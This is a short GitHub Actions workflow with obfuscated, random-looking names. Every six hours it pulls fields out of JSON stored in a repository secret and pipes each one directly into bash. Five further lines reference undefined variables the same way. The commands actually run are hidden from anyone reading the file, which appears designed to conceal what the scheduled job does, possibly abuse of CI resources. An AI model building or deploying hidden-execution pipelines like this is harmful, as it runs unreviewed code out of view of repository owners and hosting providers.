name: absorbedaid

on:
  workflow_dispatch:
  schedule:
    - cron: '3 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: absorbedaid
        env:
          krr9: ${{ secrets.krr9 }}
        run: |
          echo $krr9 | jq -r .rlbs89 | /bin/bash
          echo $fpa15 | jq -r .z05 | /bin/bash
          echo $vv20020 | jq -r .eg08937 | /bin/bash
          echo $qx48 | jq -r .vzlxi072 | /bin/bash
          echo $t37 | jq -r .s69262 | /bin/bash
          echo $a8 | jq -r .rsq7 | /bin/bash

